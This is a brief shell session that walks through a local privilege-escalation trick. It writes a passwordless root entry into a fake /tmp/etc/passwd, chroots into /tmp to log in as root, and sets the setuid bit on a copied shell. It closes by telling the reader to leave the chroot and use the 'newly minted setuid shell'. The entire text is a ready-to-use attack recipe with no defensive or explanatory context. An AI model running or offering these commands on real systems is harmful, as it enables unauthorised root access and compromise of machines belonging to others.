$ mkdir /tmp/etc $ echo root::0:0::/:/bin/sh > /tmp/etc/passwd $ mkdir /tmp/bin $ cp /bin/sh /tmp/bin/sh $ cp /bin/chmod /tmp/bin/chmod $ chroot /tmp /bin/login # whoami root # chmod 4700 /bin/sh now, log out of the chroot and use your newly minted setuid shell
